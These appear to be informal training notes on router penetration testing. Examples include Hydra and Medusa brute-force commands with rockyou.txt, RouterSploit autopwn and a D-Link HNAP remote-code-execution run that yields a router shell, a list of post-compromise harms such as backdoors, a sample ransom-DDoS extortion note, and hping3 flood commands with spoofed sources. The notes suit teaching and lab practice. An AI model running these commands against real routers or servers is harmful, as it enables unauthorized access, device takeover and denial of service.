Router Pentesting
=================
Database
Web Applications
Desktops
Servers
Web Sites
Routers
Three Different Types of scenario
=================================
1. People purchase routers and do not change the interface's credentials
Default Username
Default Passwords
admin:password
admin:admin
admin:null
1. Physical Access Of The Router
It is sticked at the bottom of my router
2. I can use open source web sites for getting default Credentials
Router is of which company
#route -n ---> it will tell me the default gateway
192.168.0.1
I will enter that IP Address in the browser
https://www.bestvpn.com/default-router-login-details/
http://192-168-1-1ip.mobi/default-router-passwords-list/
http://www.routerpasswords.com/
2. When people become little smart, They change the router's credentials
We know, sometimes the username of the router but the default password is still unkonwn to us.
Brute Force
===========
1. Hydra
2. Medussa
1. Hydra -->
One of the best tool which can be used for performing the brute force attack over different different services and protocols.
FTP
SSH
Telnet
The protocol which requires the authentication (user id|PASSWORD)
http
I know that
username --> Admin
password --> ?
i will tell hydra that the username is Admin
password --> brute force
#hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
16 valid entries, among which one of them will be my password.
2. Medussa
==========
I am faster and more reliable then Hydra,I work in a parallel way and can process more passwords as compare to Hydra.
I give more accurate credentials --> exactly one username and password
Hydra supports a limited amount of modules, but medussa supports a huge variety of modules
modules ---> Protocols
#medusa -h 192.168.0.1 -u Admin -P /usr/share/wordlists/rockyou.txt -e n -M http
success message ---> Username:Admin Password: **********
3. Those who are very very smart, and they change the username and password both.
1. Hydra -L /usr/share/wordlists/rockyou.txt
2. Medusa -U /usr/share/wordlists/rockyou.txt
Router Exploitation Framework ---> routersploit framework
=========================================================
google --> routersploit framework github
https://github.com/reverse-shell/routersploit
click on "Download or clone" --> copy the link
https://github.com/reverse-shell/routersploit.git
Open the terminal
#git clone https://github.com/reverse-shell/routersploit.git
Routersploit will download in your linux Operating system
#cd routersploit
#ls ---> rsf.py --> executable file
root@kali:~/tools/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
IoT Exploitation Framework |_|
Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Bad Blood
Version : 2.2.1
Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10
rsf >
rsf > help
Global commands:
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit
rsf > use
creds exploits payloads scanners
rsf > use scanners/
scanners/2wire_scan scanners/cameras_scan scanners/juniper_scan scanners/routers_scan
scanners/3com_scan scanners/cisco_scan scanners/linksys_scan scanners/shuttle_scan
scanners/asmax_scan scanners/comtrend_scan scanners/misc_scan scanners/technicolor_scan
scanners/asus_scan scanners/dlink_scan scanners/movistar_scan scanners/thomson_scan
scanners/autopwn scanners/fortinet_scan scanners/multi_scan scanners/tplink_scan
scanners/belkin_scan scanners/grandstream_scan scanners/netcore_scan scanners/ubiquiti_scan
scanners/bhu_scan scanners/huawei_scan scanners/netgear_scan scanners/zte_scan
scanners/billion_scan scanners/ipfire_scan scanners/netsys_scan scanners/zyxel_scan
rsf > use scanners/autopwn
rsf (AutoPwn) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target IP address e.g. 192.168.1.1
port 80 Target port
Module options:
Name Current settings Description
---- ---------------- -----------
threads 8 Number of threads
rsf (AutoPwn) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (AutoPwn) >
back check exec exit help run search set setg show use
rsf (AutoPwn) > run
[*] Could not verify exploitability: --> blue
- exploits/routers/billion/5200w_rce
- exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
- exploits/routers/dlink/dsl_2640b_dns_change
- exploits/routers/dlink/dsl_2740r_dns_change
- exploits/routers/dlink/dir_815_850l_rce
- exploits/routers/shuttle/915wm_dns_change
- exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
- exploits/routers/cisco/secure_acs_bypass
- exploits/routers/cisco/catalyst_2960_rocem
[+] Device is vulnerable: --> green
- exploits/routers/dlink/multi_hnap_rce
rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
rsf (D-Link Multi HNAP RCE) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
port 80 Target Port
rsf (D-Link Multi HNAP RCE) > set target http://192.168.0.1
[+] {'target': 'http://192.168.0.1'}
rsf (D-Link Multi HNAP RCE) > run
cmd> --> shell of the router
Organisation ----> cisco routers
MS --> Windows
Linux --> Red Hat|fedora|Ubuntu
Router --> IOS
iOS
IOS --> Interconnection Operating system
Cisco Packet Tracer ---> simulator for Routers and Switched (Network Administrator CCNA)
Harms which can be caused by router's shell
-------------------------------------------
Implant Backdoor
Port Forwarding
Authentication Canging
Block MAD Addresses --> MAC Filtering
Network Traffic Monitoring
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DoS Attack
----------
It is the type of attack in which a single user sends multiple request to a host. In other words, a user create a huge amount of traffic of the host server. It may lead to crashing of the system. Which further leads to system faliure or make the system down for some time.
www.amazon.com ---> i deployed a DoS attack ----> which means, the server will start getting slow.
User will get frustate and will go and purchase items from other competetors of amazon.
Hello Sir,
I am having a botnet of 10,000 devices. Please, it is a humble request to you that, pay me $50,000 USD or else I will deploy a DoS|DDoS Attack on your server.
Bitcoin account number ----> ************
With Love
Attacker
Hello Attacker,
Please do not deploy any kind of such attack. We are ready to pay you the specific ammount of money ASAP.
Size --> greater that xxx
Data is coming from single IP Address
It is continuously sending the traffic
Block that IP Address
DDoS --> Distributed Deniel Of Service
======================================
It is kind of DoS attack, in which there are many machines, who will send the data from their devices to the target machine.
hping3
======
Network tool. WHich is used for
Testing firewall
Testing TCP/IP connection
Testing IDS and IPS
Used for scanning the open ports
It is also used for generating traffic over the network
hping3 172.16.226.143 --flood --rand-source -c 500000 -d 12000 -p 8080
hping3 --> tool
172.16.226.143 --> target IP Address
--flood --> to send packets continuously
--rand-source --> to give the source IP Address as random source
-c --> count --< how many packets we do need to send
-d --> size ---> size of one packet
-p --> port number
hping3 172.16.226.143 --flood --rand-source -c 500000 -d 12000 -p 443
Read
====
There are 4 different type of authentication
1. Basic Authentication
2. Integrated Authentication
3. Digest Authentication
4. Form Based Authentication
Task --> to implement the medusa on your router